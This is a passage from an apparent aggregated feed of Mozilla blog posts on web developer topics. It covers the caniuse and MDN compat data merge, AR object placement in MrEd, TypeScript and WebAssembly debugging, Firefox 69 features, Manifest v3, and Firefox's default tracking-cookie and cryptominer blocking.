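  css: {
    properties: {
      grid: {
        __compat: {
          support: {
            firefox: { version_added: '52' },
            ie:      { version_added: false }
          }
        }
      }
    }
  }
};

// Returns the first version of `browser` that supports the feature,
// or null when support was never added.
function firstSupportedVersion(feature, browser) {
  const entry = feature.__compat.support[browser];
  return entry && entry.version_added ? entry.version_added : null;
}

console.log(firstSupportedVersion(bcd.css.properties.grid, 'firefox')); // '52'
console.log(firstSupportedVersion(bcd.css.properties.grid, 'ie'));      // null
```

In a real project you would require the npm package instead of the inline object and walk the same tree of categories and features.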

Two great data sources come together

Today we’re announcing the integration of MDN’s compat data into the caniuse website. Together, we’re bringing even more web compatibility information into the hands of web developers.

Caniuse table for Intl.RelativeTimeFormat. Data imported from mdn-compat-data.

Before we began our collaboration, the caniuse website only displayed results for features available in the caniuse database. Now all search results can include support tables for MDN compat data. This includes data types already found on caniuse, specifically the HTML, CSS, JavaScript, Web API, SVG, and HTTP categories. By adding MDN data, the caniuse support table count expands from roughly 500 to 10,500 tables! Developers’ caniuse queries on what’s supported where will now have significantly more results.

The new feature tables will look a little different. Because the MDN compat data project and caniuse have compatible yet somewhat different goals, the implementation is a little different too. While the new MDN-based tables don’t have matching fields for all the available metadata (such as links to resources and a full feature description), support notes and details such as bug information, prefixes, feature flags, etc. will be included.

The MDN compatibility data itself is converted under the hood to the same format used in caniuse compat tables. Thus, users can filter and arrange MDN-based data tables in the same way as any other caniuse table. This includes access to browser usage information, either by region or imported through Google Analytics to help you decide when a feature has enough support for your users. And the different view modes available via both datasets help visualize support information.

Differences in the datasets

We’ve been asked why the datasets are treated differently. Why didn’t we merge them in the first place? We discussed and considered this option. However, due to the intrinsic differences between our two projects, we decided not to. Here’s why:

MDN’s support data is very broad and covers feature support at a very granular level. This allows MDN to provide as much detailed information as possible across all web technologies, supplementing the reference information provided by MDN Web Docs.

Caniuse, on the other hand, often looks at larger features as a whole (e.g. CSS Grid, WebGL, specific file format support). The caniuse approach provides developers with higher level at-a-glance information on whether the feature’s supported. Sometimes detail is missing. Each individual feature is added manually to caniuse, with a primary focus on browser support coverage rather than on feature coverage overall.

Because of these and other differences in implementation, we don’t plan on merging the source data repositories or matching the data schema at this time. Instead, the integration works by matching the search query to the feature’s description on caniuse.com. Then, caniuse generates an appropriate feature table, and converts MDN support data to the caniuse format on the fly.
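To make the on-the-fly conversion concrete, here is a minimal sketch. Everything in it is illustrative rather than the projects' real schemas: the field name version_added does come from the MDN compat data format, but the surrounding shapes and the function itself are invented for this example.

```javascript
// Hypothetical sketch: turn an MDN-style support statement into a
// caniuse-style per-version stats object. Real BCD and caniuse data
// are much richer; this only shows the general idea.
function mdnToCaniuseStats(mdnSupport, versions) {
  const stats = {};
  for (const [browser, entry] of Object.entries(mdnSupport)) {
    stats[browser] = {};
    const added = entry.version_added; // e.g. "69", true, or false
    for (const version of versions[browser] || []) {
      const supported =
        added === true ||
        (typeof added === 'string' && Number(version) >= Number(added));
      // caniuse marks each browser version with flags like "y" (yes) or "n" (no)
      stats[browser][version] = supported ? 'y' : 'n';
    }
  }
  return stats;
}
```

For example, a feature marked as added in Firefox 69 would produce "n" for 68 and "y" for 69 and 70.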

What’s next

We encourage community members of both repos, caniuse and mdn-compat-data, to work together to improve the underlying data. By sharing information and collaborating wherever possible, we can help web developers find answers to compatibility questions.

The post Caniuse and MDN compatibility data collaboration appeared first on Mozilla Hacks - the Web developer blog.

Mozilla VR BlogSemantic Placement in Augmented Reality using MrEd

Semantic Placement in Augmented Reality using MrEd

In this article we’re going to take a brief look at how we may want to think about placement of objects in Augmented Reality. We're going to use our recently released lightweight AR editing tool MrEd to make this easy to demonstrate.

Designers often express ideas in a domain appropriate language. For example a designer may say “place that chair on the floor” or “hang that photo at eye level on the wall”.

However when we finalize a virtual scene in 3d we often keep only the literal or absolute XYZ position of elements and throw out the original intent - the deeper reason why an object ended up in a certain position.

It turns out that it’s worth keeping the intention - so that when AR scenes are re-created for new participants or in new physical locations that the scenes still “work” - that they still are satisfying experiences - even if some aspects change.

In a sense this recognizes the Japanese term 'Wabi-Sabi'; that aesthetic placement is always imperfect and contends between fickle forces. Describing placement in terms of semantic intent is also similar to responsive design on the web or the idea of design patterns as described by Christopher Alexander.

Let’s look at two simple examples of semantic placement in practice.

1. Relative to the Ground

When you’re placing objects in augmented reality you often want to specify that those objects should be relationally placed in a position relative to other objects. A typical, in fact ubiquitous, example of placement is that often you want an object to be positioned relative to “the ground”.

Sometimes the designer's intent is to select the highest relative surface underneath the object in question (such as placing a lamp on a table) or at other times to select the lowest relative surface underneath an object (such as say placing a kitten on the floor under a table). Often, as well, we may want to express a placement in the air - such as say a mailbox, or a bird.
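These two strategies can be sketched as a small helper that picks a support surface under an object. This is plain illustrative JavaScript, not MrEd's actual API; the surface shape (y, halfWidth, halfDepth) is invented for the example.

```javascript
// Hypothetical sketch: pick the detected horizontal surface under an
// object. 'highest' puts the lamp on the table; 'lowest' puts the
// kitten on the floor beneath it.
function findSurfaceBelow(object, surfaces, strategy = 'highest') {
  // Keep only surfaces that are below the object and extend under it
  const below = surfaces.filter(s =>
    s.y <= object.y &&
    Math.abs(s.x - object.x) <= s.halfWidth &&
    Math.abs(s.z - object.z) <= s.halfDepth
  );
  if (below.length === 0) return null;
  return below.reduce((best, s) =>
    (strategy === 'highest' ? s.y > best.y : s.y < best.y) ? s : best
  );
}
```

With a table at y = 0.7 and a floor at y = 0 beneath a lamp, the 'highest' strategy selects the table and the 'lowest' strategy selects the floor.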

In this very small example I’ve attached a ground detection script to a duck, and then sprinkled a few other passive objects around the scene. As the ground is detected the duck will pop down from a default position to be offset relative to the ground (although still in the air). See the GIF above for an example of the effect.

To try this scene out yourself you will need WebXR for iOS which is a preview of emerging WebXR standards using iOS ARKit to expose augmented reality features in a browser environment. This is the url for the scene above in play mode (on a WebXR capable device):


Here is what it should look like in edit mode:

Semantic Placement in Augmented Reality using MrEd

You can also clone the glitch and edit the scene yourself (you’ll want to remember to set a password in the .env file and then login from inside MrEd). See:


Here’s my script itself:

/// #title grounded
/// #description Stick to Floor/Ground - dynamically and constantly searching for low areas nearby
{
    start: function(evt) {
        // Begin painting detected ground planes for visual feedback
        this.sgp.startWorldInfo()
    },
    tick: function(e) {
        let floor = this.sgp.getFloorNear({point:e.target.position})
        if(floor) {
            e.target.position.y = floor.y
        }
    }
}

This is relying on code baked into MrEd (specifically inside of findFloorNear() in XRWorldInfo.js if you really want to get detailed).

In the above example I begin by calling startWorldInfo() to start painting the ground planes (so that I can see them since it’s nice to have visual feedback). And, every tick, I call a floor finder subroutine which simply returns the best guess as to the floor in that area. The floor finder logic in this case is pre-defined but one could easily imagine other kinds of floor finding strategies that were more flexible.

2. Follow the player

Another common designer intent is to make sure that some content is always visible to the player. For designers in virtual or augmented reality, it can be challenging to direct a user's attention to virtual objects. These are 3D immersive worlds, and the player can be looking in any direction. Some kind of mechanic is needed to help make sure that the player sees what they need to see.

One common simple solution is to build an object that stays in front of the user. This can be itself a combination of multiple simpler behaviors. An object can be ordered to seek a position in front of the user, be at a certain height, and ideally billboarded so that any signage or message is always legible.

In this example a sign is decorated with two separate scripts, one to keep the sign in front of the player, and another to billboard the sign to face the player.
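The underlying math for those two behaviors is simple. The sketch below is plain vector arithmetic for illustration, not MrEd's actual script API; the player object with a forward vector is an assumption made for the example.

```javascript
// Hypothetical sketch: keep an object a fixed distance in front of the
// player, roughly at eye level.
function positionInFront(player, distance = 2, height = 1.6) {
  // player.forward is assumed to be a unit vector on the ground plane
  return {
    x: player.x + player.forward.x * distance,
    y: height,
    z: player.z + player.forward.z * distance
  };
}

// Hypothetical sketch: yaw (rotation about the vertical axis) that
// turns a sign to face the player, so its text stays legible.
function billboardYaw(object, player) {
  return Math.atan2(player.x - object.x, player.z - object.z);
}
```

A sign could apply positionInFront each frame to follow the player, and billboardYaw to stay readable.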


Closing thoughts

We’ve only scratched the surface of the kinds of intent that could be expressed or combined together. If you want to dive deeper, there is a longer list in a separate article (Laundry List of UX Patterns). I also invite you to help extend the industry: think both about what high level intentions you mean when you place objects and also about how you'd communicate those intentions.

The key insight here is that preserving semantic intent means thinking of objects as intelligent, able to respond to simple high level goals. Virtual objects are more than just statues or art at a fixed position, but can be entities that can do your bidding, and follow high level rules.

Ultimately future 3d tools will almost certainly provide these kinds of services - much in the way CSS provides layout directives. We should also expect to see conventions emerge as more designers begin to work in this space. As a call to action, it's worth it to notice the high level intentions that you want, and to get the developers of the tools that you use to start to incorporate those intentions as primitives.

hacks.mozilla.orgDebugging TypeScript in Firefox DevTools

Firefox Debugger has evolved into a fast and reliable tool chain over the past several months, and it now supports many cool features. Though primarily used to debug JavaScript, did you know that you can also use Firefox to debug your TypeScript applications?

Before we jump into real world examples, note that today’s browsers can’t run TypeScript code directly. It’s important to understand that TypeScript needs to be compiled into JavaScript before it’s included in an HTML page.

Also, debugging TypeScript is done through a source-map, and so we need to instruct the compiler to produce a source-map for us as well.

You’ll learn the following in this post:

  • Compiling TypeScript to JavaScript
  • Generating source-map
  • Debugging TypeScript

Let’s get started with a simple TypeScript example.

TypeScript Example

The following code snippet shows a simple TypeScript hello world page.

// hello.ts
interface Person {
  firstName: string;
  lastName: string;
}

function hello(person: Person) {
  return "Hello, " + person.firstName + " " + person.lastName;
}

function sayHello() {
  let user = { firstName: "John", lastName: "Doe" };
  document.getElementById("output").innerText = hello(user);
}

TypeScript (TS) is very similar to JavaScript and the example should be understandable even for JS developers unfamiliar with TypeScript.

The corresponding HTML page looks like this:

// hello.html
<!DOCTYPE html>
<html>
  <body>
    <script src="hello.js"></script>
    <button onclick="sayHello()">Say Hello!</button>
    <div id="output"></div>
  </body>
</html>

Note that we are including hello.js, not the hello.ts file, in the HTML page. Today’s browsers can’t run TS directly, and so we need to compile our hello.ts file into regular JavaScript.

The rest of the HTML file should be clear. There is one button that executes the sayHello() function and <div id="output"> that is used to show the output (hello message).

Next step is to compile our TypeScript into JavaScript.

Compiling TypeScript To JavaScript

To compile TypeScript into JavaScript you need to have a TypeScript compiler installed. This can be done through NPM (Node Package Manager).

npm install -g typescript

Using the following command, we can compile our hello.ts file. It should produce a JavaScript version of the file with the *.js extension.

tsc hello.ts

In order to produce a source-map that describes the relationship between the original code (TypeScript) and the generated code (JavaScript), you need to use an additional --sourceMap argument. It generates a corresponding *.map file.

tsc hello.ts --sourceMap

Yes, it’s that simple.

You can read more about other compiler options if you are interested.

The generated JS file should look like this:

function hello(person) {
  return "Hello, " + person.firstName + " " + person.lastName;
}
function sayHello() {
  var user = { firstName: "John", lastName: "Doe" };
  document.getElementById("output").innerText = hello(user);
}
//# sourceMappingURL=hello.js.map

The most interesting thing is probably the comment at the end of the generated file. The syntax comes from old Firebug times and refers to a source map file containing all information about the original source.

Are you curious what the source map file looks like? Here it is.


It contains information (including location) about the generated file (hello.js), the original file (hello.ts), and, most importantly, mappings between those two. With this information, the debugger knows how to interpret the TypeScript code even if it doesn’t know anything about TypeScript.
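For orientation, a source map is itself just a small JSON file. The sketch below shows the general shape for this example; the mappings value is a Base64 VLQ encoding of the position mappings and is abbreviated here, not a real encoding of this file.

```json
{
  "version": 3,
  "file": "hello.js",
  "sourceRoot": "",
  "sources": ["hello.ts"],
  "names": [],
  "mappings": "AAAA,..."
}
```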

The original language could be anything (Rust, C++, etc.) and with a proper source map, the debugger knows what to do. Isn’t that magic?

We are all set now. The next step is loading our little app into the Debugger.

Debugging TypeScript

The debugging experience is no different from how you’d go about debugging standard JS. You’re actually debugging the generated JavaScript, but since source-map is available the debugger knows how to show you the original TypeScript instead.

This example is available online, so if you are running Firefox you can try it right now.

Let’s start with creating a breakpoint on line 9 in our original TypeScript file. To hit the breakpoint you just need to click on the Say Hello! button introduced earlier.

Debugging TypeScript

See, it’s TypeScript there!

Note the Call stack panel on the right side, it properly shows frames coming from hello.ts file.

One more thing: If you are interested in seeing the generated JavaScript code you can use the context menu and jump right into it.

This action should navigate you to the hello.js file and you can continue debugging from the same location.

You can see that the Sources tree (on the left side) shows both these files at the same time.

Map Scopes

Let’s take a look at another neat feature that allows inspection of variables in both original and generated scopes.

Here is a more complex glitch example.

  1. Load https://firefox-devtools-example-babel-typescript.glitch.me/
  2. Open DevTools Toolbox and select the Debugger panel
  3. Create a breakpoint in Webpack/src/index.tsx file on line 45
  4. The breakpoint should pause JS execution immediately

Screenshot of the DevTools debugger panel allowing inspection of variables in both original and generated scopes

Notice the Scopes panel on the right side. It shows variables coming from generated (and also minified) code and it doesn’t correspond to the original TSX (TypeScript with JSX) code, which is what you see in the Debugger panel.

There is a weird e variable instead of localeTime, which is actually used in the source code.

This is where the Map scopes feature comes in handy. In order to see the original variables (used in the original TypeScript code), just click the Map checkbox.

Debugger panel in Firefox DevTools,using the Map checkbox to see original TypeScript variables

See, the Scopes panel shows the localeTime variable now (and yes, the magic comes from the source map).

Finally, if you are interested in where the e variable comes from, jump into the generated location using the context menu (like we just did in the previous example).

DevTools showing Debugger panel using the context menu to locate the e variable

Stay tuned for more upcoming Debugger features!

Jan ‘Honza’ Odvarko

The post Debugging TypeScript in Firefox DevTools appeared first on Mozilla Hacks - the Web developer blog.

hacks.mozilla.orgDebugging WebAssembly Outside of the Browser

WebAssembly has begun to establish itself outside of the browser via dedicated runtimes like Mozilla’s Wasmtime and Fastly’s Lucet. While the promise of a new, universal format for programs is appealing, it also comes with new challenges. For instance, how do you debug .wasm binaries?

At Mozilla, we’ve been prototyping ways to enable source-level debugging of .wasm files using traditional tools like GDB and LLDB.

The screencast below shows an example debugging session. Specifically, it demonstrates using Wasmtime and LLDB to inspect a program originally written in Rust, but compiled to WebAssembly.

This type of source-level debugging was previously impossible. And while the implementation details are subject to change, the developer experience—attaching a normal debugger to Wasmtime—will remain the same.

By allowing developers to examine programs in the same execution environment as a production WebAssembly program, Wasmtime’s debugging support makes it easier to catch and diagnose bugs that may not arise in a native build of the same code. For example, the WebAssembly System Interface (WASI) treats filesystem access more strictly than traditional Unix-style permissions. This could create issues that only manifest in WebAssembly runtimes.

Mozilla is proactively working to ensure that WebAssembly’s development tools are capable, complete, and ready to go as WebAssembly expands beyond the browser.

Please try it out and let us know what you think.

Note: Debugging using Wasmtime and LLDB should work out of the box on Linux with Rust programs, or with C/C++ projects built via the WASI SDK.

Debugging on macOS currently requires building and signing a more recent version of LLDB.

Unfortunately, LLDB for Windows does not yet support JIT debugging.

Thanks to Lin Clark, Till Schneidereit, and Yury Delendik for their assistance on this post, and for their work on WebAssembly debugging.

The post Debugging WebAssembly Outside of the Browser appeared first on Mozilla Hacks - the Web developer blog.

SeaMonkeyPost-release post…


SeaMonkey is currently quite far behind the release schedule (rapid release or otherwise). Mozilla isn’t making it easier for us to release things; but hopefully we’ll soon be on our own release schedule (if we’re not already), so that Mozilla’s schedule won’t have any effect on us.

That said, I can’t help but feel that I’ve dropped the proverbial ball on this release. I’d like to personally offer my own apologies for the delay. It’s entirely and wholly my fault and not the fault of the other devs. I have a lot of ideas to get things working again, and I’m hoping I’ll get the chance to do what I’ve set out to do for SeaMonkey.

Yours truly,


SeaMonkeySeaMonkey 2.49.5 has been released!

Hi Everyone.

2.49.5 was just ‘released’ (aka pushed to the releases/2.49.5 portion of archive.mozilla.org).

It has been an intensely frustrating experience, and dare I say worse than 2.46’s release.  I can’t imagine how much everyone is wanting to kick me off the team…

I’m still working on making the release process ‘smoother’, but it’s a very steep uphill battle (dare I even quote Richie from “Bottoms”..  “Steep?  It’s F’ing vertical!”)

That said…  I’ve got some time to fix this whole smegging smegfest..

Yours honestly,


Mozilla Add-ons BlogMozilla’s Manifest v3 FAQ

What is Manifest v3?

Chrome versions the APIs they provide to extensions, and the current format is version 2. The Firefox WebExtensions API is nearly 100% compatible with version 2, allowing extension developers to easily target both browsers.

In November 2018, Google proposed an update to their API, which they called Manifest v3. This update includes a number of changes that are not backwards-compatible and will require extension developers to take action to remain compatible.

A number of extension developers have reached out to ask how Mozilla plans to respond to the changes proposed in v3. Following are answers to some of the frequently asked questions.

Why do these changes negatively affect content blocking extensions?

One of the proposed changes in v3 is to deprecate a very powerful API called blocking webRequest. This API gives extensions the ability to intercept all inbound and outbound traffic from the browser, and then block, redirect or modify that traffic.

In its place, Google has proposed an API called declarativeNetRequest. This API impacts the capabilities of content blocking extensions by limiting the number of rules, as well as available filters and actions. These limitations negatively impact content blockers because modern content blockers are very sophisticated and employ layers of algorithms to not only detect and block ads, but to hide from the ad networks themselves. Extensions would still be able to use webRequest but only to observe requests, not to modify or block them.
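To illustrate the difference, a declarativeNetRequest rule is a static JSON description that the browser evaluates itself, rather than code the extension runs per request. The sketch below is based on Google's draft proposal and the exact schema may change:

```json
{
  "id": 1,
  "priority": 1,
  "action": { "type": "block" },
  "condition": {
    "urlFilter": "||ads.example.com",
    "resourceTypes": ["script", "image"]
  }
}
```

Because the browser matches rules directly, an extension never sees the request contents, which is precisely why layered, adaptive blocking logic is hard to express this way.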

As a result, some content blocking extension developers have stated they can no longer maintain their add-on if Google decides to follow through with their plans. Those who do continue development may not be able to provide the same level of capability for their users.

Will Mozilla follow Google with these changes?

In the absence of a true standard for browser extensions, maintaining compatibility with Chrome is important for Firefox developers and users. Firefox is not, however, obligated to implement every part of v3, and our WebExtensions API already departs in several areas under v2 where we think it makes sense.

Content blocking: We have no immediate plans to remove blocking webRequest and are working with add-on developers to gain a better understanding of how they use the APIs in question to help determine how to best support them.

Background service workers: Manifest v3 proposes the implementation of service workers for background processes to improve performance. We are currently investigating the impact of this change, what it would mean for developers, and whether there is a benefit in continuing to maintain background pages.

Runtime host permissions: We are evaluating the proposal in Manifest v3 to give users more granular control over the sites they give permissions to, and investigating ways to do so without too much interruption and confusion.

Cross-origin communication: In Manifest v3, content scripts will have the same permissions as the page they are injected in. We are planning to implement this change.

Remotely hosted code: Firefox already does not allow remote code as a policy. Manifest v3 includes a proposal for additional technical enforcement measures, which we are currently evaluating and intend to also enforce.

Will my extensions continue to work in Manifest v3?

Google’s proposed changes, such as the use of service workers in the background process, are not backwards-compatible. Developers will have to adapt their add-ons to accommodate these changes.

That said, the changes Google has proposed are not yet stabilized. Therefore, it is too early to provide specific guidance on what to change and how to do so. Mozilla is waiting for more clarity and has begun investigating the effort needed to adapt.

We will provide ongoing updates about changes necessary on the add-ons blog.

What is the timeline for these changes?

Given Manifest v3 is still in the draft and design phase, it is too early to provide a specific timeline. We are currently investigating what level of effort is required to make the changes Google is proposing, and identifying where we may depart from their plans.

Later this year we will begin experimenting with the changes we feel have a high chance of being part of the final version of Manifest v3, and that we think make sense for our users. Early adopters will have a chance to test our changes in the Firefox Nightly and Beta channels.

Once Google has finalized their v3 changes and Firefox has implemented the parts that make sense for our developers and users, we will provide ample time and documentation for extension developers to adapt. We do not intend to deprecate the v2 API before we are certain that developers have a viable path forward to migrate to v3.

Keep your eyes on the add-ons blog for updates regarding Manifest v3 and some of the other work our team is up to. We welcome your feedback on our community forum.


hacks.mozilla.orgFirefox 69 — a tale of Resize Observer, microtasks, CSS, and DevTools

For our latest excellent adventure, we’ve gone and cooked up a new Firefox release. Version 69 features a number of nice new additions including JavaScript public instance fields, the Resize Observer and Microtask APIs, CSS logical overflow properties (e.g. overflow-block), and @supports for selectors.

We will also look at highlights from the raft of new debugging features in the Firefox 69 DevTools, including console message grouping, event listener breakpoints, and text label checks.

This blog post provides merely a set of highlights; for all the details, check out the following:

The new CSS

Firefox 69 supports a number of new CSS features; the most interesting are as follows.

New logical properties for overflow

69 sees support for some new logical properties — overflow-block and overflow-inline — which control the overflow of an element’s content in the block or inline dimension respectively.

These properties map to overflow-x or overflow-y, depending on the content’s writing-mode. Using these new logical properties instead of overflow-x and overflow-y makes your content easier to localize, especially when adapting it to languages using a different writing direction. They can also take the same values — visible, hidden, scroll, auto, etc.
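For example, in a horizontal writing mode the block dimension is vertical, so overflow-block behaves like overflow-y; switch the same component to a vertical writing mode and the declarations automatically apply to the other physical axis. The class name below is illustrative:

```css
.scroll-region {
  /* In horizontal-tb this acts like overflow-y;
     in vertical-rl it acts like overflow-x. */
  overflow-block: auto;
  /* And this is the inline dimension: overflow-x in
     horizontal-tb, overflow-y in vertical-rl. */
  overflow-inline: hidden;
}
```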

Note: Look at Handling different text directions if you want to read up on these concepts.

@supports for selectors

The @supports at-rule has long been very useful for selectively applying CSS only when a browser supports a particular property, or doesn’t support it.

Recently this functionality has been extended so that you can apply CSS only if a particular selector is or isn’t supported. The syntax looks like this:

@supports selector(selector-to-test) {
  /* insert rules here */
}

We are supporting this functionality by default in Firefox 69 onwards. Find some usage examples here.

JavaScript gets public instance fields

The most interesting addition we’ve had to the JavaScript language in Firefox 69 is support for public instance fields in JavaScript classes. This allows you to specify properties you want the class to have up front, making the code more logical and self-documenting, and the constructor cleaner. For example:

class Product {
  tax = 0.2;
  basePrice = 0;

  constructor(name, basePrice) {
    this.name = name;
    this.basePrice = basePrice;
    this.price = (basePrice * (1 + this.tax)).toFixed(2);
  }
}

Notice that you can include default values if wished. The class can then be used as you’d expect:

let bakedBeans = new Product('Baked Beans', 0.59);
console.log(`${bakedBeans.name} cost $${bakedBeans.price}.`);

Private instance fields (which can’t be set or referenced outside the class definition) are very close to being supported in Firefox, and also look to be very useful. For example, we might want to hide the details of the tax and base price. Private fields are indicated by a hash symbol in front of the name:

#tax = 0.2;
#basePrice = 0;

The wonder of WebAPIs

There are a couple of new WebAPIs enabled by default in Firefox 69. Let’s take a look.

Resize Observer

Put simply, the Resize Observer API allows you to easily observe and respond to changes in the size of an element’s content or border box. It provides a JavaScript solution to the often-discussed lack of “element queries” in the web platform.

A trivial example might be something like the following (resize-observer-border-radius.html, see the source also), which adjusts the border-radius of a <div> as it gets smaller or bigger:

const resizeObserver = new ResizeObserver(entries => {
  for (let entry of entries) {
    if(entry.contentBoxSize) {
      entry.target.style.borderRadius = Math.min(100, (entry.contentBoxSize.inlineSize/10) +
                                                      (entry.contentBoxSize.blockSize/10)) + 'px';
    } else {
      entry.target.style.borderRadius = Math.min(100, (entry.contentRect.width/10) +
                                                      (entry.contentRect.height/10)) + 'px';
    }
  }
});

resizeObserver.observe(document.querySelector('div'));


“But you can just use border-radius with a percentage”, I hear you cry. Well, sort of. But that quickly leads to ugly-looking elliptical corners, whereas the above solution gives you nice square corners that scale with the box size.

Another, slightly less trivial example is the following (resize-observer-text.html , see the source also):

if(window.ResizeObserver) {
  const h1Elem = document.querySelector('h1');
  const pElem = document.querySelector('p');
  const divElem = document.querySelector('body > div');
  const slider = document.querySelector('input');

  divElem.style.width = '600px';

  slider.addEventListener('input', () => {
    divElem.style.width = slider.value + 'px';
  });

  const resizeObserver = new ResizeObserver(entries => {
    for (let entry of entries) {
      if(entry.contentBoxSize) {
        h1Elem.style.fontSize = Math.max(1.5, entry.contentBoxSize.inlineSize/200) + 'rem';
        pElem.style.fontSize = Math.max(1, entry.contentBoxSize.inlineSize/600) + 'rem';
      } else {
        h1Elem.style.fontSize = Math.max(1.5, entry.contentRect.width/200) + 'rem';
        pElem.style.fontSize = Math.max(1, entry.contentRect.width/600) + 'rem';
      }
    }
  });

  resizeObserver.observe(divElem);
}


Here we use the resize observer to change the font-size of a header and paragraph as a slider’s value is changed, causing the containing <div> to change its width. This shows that you can respond to changes in an element’s size, even if they have nothing to do with the viewport size changing.

So to summarise, Resize Observer opens up a wealth of new responsive design work that was difficult to achieve with CSS features alone. We’re even using it to implement a new responsive version of our new DevTools JavaScript console!


Microtasks

The Microtasks API provides a single method — queueMicrotask(). This is a low-level method that enables us to directly schedule a callback on the microtask queue. This schedules code to be run immediately before control returns to the event loop, so you are assured a reliable running order (using setTimeout(() => {}, 0), for example, can give unreliable results).

The syntax is as simple to use as other timing functions:

self.queueMicrotask(() => {
  // function contents here
});

The use cases are subtle, but make sense when you read the explainer section in the spec. The biggest benefactors here are framework vendors, who like lower-level access to scheduling. Using this will reduce hacks and make frameworks more predictable cross-browser.
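A quick way to see the guarantee in action: the callback never runs synchronously within the current task, but it does run before any timeout, as soon as the current task finishes.

```javascript
const order = [];

setTimeout(() => order.push('timeout'), 0);    // macrotask: runs last
queueMicrotask(() => order.push('microtask')); // runs before any timeout
order.push('sync');

// At this point only 'sync' has been pushed; the microtask fires as
// soon as the current task returns to the event loop, ahead of the
// timeout callback.
```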

Developer tools updates in 69

There are various interesting additions to the DevTools in 69, so be sure to go and check them out!

Event breakpoints and async functions in the JS debugger

The JavaScript debugger has some cool new features for stepping through and examining code:

New remote debugging

In the new shiny about:debugging page, you’ll find a grouping of options for remotely debugging devices, with more to follow in the future. In 69, we’ve enabled a new mechanism for allowing you to remotely debug other versions of Firefox, on the same machine or other machines on the same network (see Network Location).

Console message grouping

In the console, we now group together similar error messages, with the aim of making the console tidier, spamming developers less, and making them more likely to pay attention to the messages. In turn, this can have a positive effect on security/privacy.

The new console message grouping looks like this, when in its initial closed state:

When you click the arrow to open the message list, it shows you all the individual messages that are grouped:

Initially the grouping occurs on CSP, CORS, and tracking protection errors, with more categories to follow in the future.

Flex information in the picker infobar

Next up, we’ll have a look at the Page inspector. When using the picker, or hovering over an element in the HTML pane, the infobar for the element now shows when it is a flex container, item, or both.

website nav menu with infobar pointing out that it is a flex item

See this page for more details.

Text Label Checks in the Accessibility Inspector

A final great feature to mention is the new text label checks feature of the Accessibility Inspector.

When you choose Check for issues > Text Labels from the dropdown box at the top of the accessibility inspector, it marks all the nodes in the accessibility tree with a warning sign if it is missing a descriptive text label. The Checks pane on the right hand side then gives a description of the problem, along with a Learn more link that takes you to more detailed information available on MDN.

WebExtensions updates

Last but not least, let’s give a mention to WebExtensions! The main feature to make it into Firefox 69 is User Scripts — these are a special kind of extension content script that, when registered, instruct the browser to insert the given scripts into pages that match the given URL patterns.

See also

In this post we’ve reviewed the main web platform features added in Firefox 69. You can also read up on the main new features of the Firefox browser — see the Firefox 69 Release Notes.

The post Firefox 69 — a tale of Resize Observer, microtasks, CSS, and DevTools appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogToday’s Firefox Blocks Third-Party Tracking Cookies and Cryptomining by Default

Today, Firefox on desktop and Android will — by default — empower and protect all our users by blocking third-party tracking cookies and cryptominers. This milestone marks a major step in our multi-year effort to bring stronger, usable privacy protections to everyone using Firefox.

Firefox’s Enhanced Tracking Protection gives users more control

For today’s release, Enhanced Tracking Protection will automatically be turned on by default for all users worldwide as part of the ‘Standard’ setting in the Firefox browser and will block known “third-party tracking cookies” according to the Disconnect list. We first enabled this default feature for new users in June 2019. As part of this journey we rigorously tested, refined, and ultimately landed on a new approach to anti-tracking that is core to delivering on our promise of privacy and security as central aspects of your Firefox experience.

Currently over 20% of Firefox users have Enhanced Tracking Protection on. With today’s release, we expect to provide protection for 100% of our users by default. Enhanced Tracking Protection works behind the scenes to keep a company from forming a profile of you based on their tracking of your browsing behavior across websites — often without your knowledge or consent. Those profiles and the information they contain may then be sold and used for purposes you never knew or intended. Enhanced Tracking Protection helps to mitigate this threat and puts you back in control of your online experience.

You’ll know Enhanced Tracking Protection is working when you visit a site and see a shield icon in the address bar:


When you see the shield icon, you can be confident that Firefox is blocking thousands of companies from tracking your online activity.

For those who want to see which companies we block, you can click on the shield icon, go to the Content Blocking section, then Cookies. It should read Blocking Tracking Cookies. Then click on the arrow on the right-hand side, and you’ll see a list of the companies whose third-party cookies Firefox has blocked:

If you want to turn off blocking for a specific site, click on the Turn off Blocking for this Site button.

Protecting users’ privacy beyond tracking cookies

Cookies are not the only entities that follow you around on the web, trying to use what’s yours without your knowledge or consent. Cryptominers, for example, access your computer’s CPU, ultimately slowing it down and draining your battery, in order to generate cryptocurrency, not for your benefit but for someone else’s. We introduced the option to block cryptominers in previous versions of Firefox Nightly and Beta and are including it in the ‘Standard Mode’ of your Content Blocking preferences as of today.

Another type of script that you may not want to run in your browser is the fingerprinting script. Fingerprinting scripts harvest a snapshot of your computer’s configuration when you visit a website. That snapshot can then be used to track you across the web, an issue that has been present for years. To get protection from fingerprinting scripts, Firefox users can turn on ‘Strict Mode.’ In a future release, we plan to turn fingerprinting protections on by default.

Also in today’s Firefox release

To see what else is new or what we’ve changed in today’s release, you can check out our release notes.

Check out and download the latest version of Firefox available here.

The post Today’s Firefox Blocks Third-Party Tracking Cookies and Cryptomining by Default appeared first on The Mozilla Blog.

Mozilla ServicesA New Policy for Mozilla Location Service

Several years ago we started a geolocation experiment called the Mozilla Location Service (MLS) to create a location service built on open-source software and powered through crowdsourced location data. MLS provides geolocation lookups based on publicly observable cell tower and WiFi access point information. MLS has served the public interest by providing location information to open-source operating systems, research projects, and developers.
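For a sense of what an MLS lookup involves, the sketch below only builds the JSON request body from observed networks; the field names follow the public Ichnaea service documentation, while the endpoint URL and key shown in the comment are assumptions for illustration, and no network call is made:

```python
import json

# Build an MLS geolocate request body from publicly observable cell
# tower and WiFi access point information (illustrative values; field
# names per the Ichnaea API documentation).
request_body = {
    "cellTowers": [{
        "radioType": "lte",
        "mobileCountryCode": 208,   # example values, not a real tower
        "mobileNetworkCode": 1,
        "locationAreaCode": 2,
        "cellId": 1234567,
    }],
    "wifiAccessPoints": [
        {"macAddress": "01:23:45:67:89:ab", "signalStrength": -51},
        {"macAddress": "01:23:45:67:89:cd", "signalStrength": -68},
    ],
}

payload = json.dumps(request_body)
# One would POST this payload with an MLS API Query key, e.g. to
#   https://location.services.mozilla.com/v1/geolocate?key=YOUR_QUERY_KEY
# and receive a response like
#   {"location": {"lat": ..., "lng": ...}, "accuracy": ...}
assert "wifiAccessPoints" in json.loads(payload)
```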

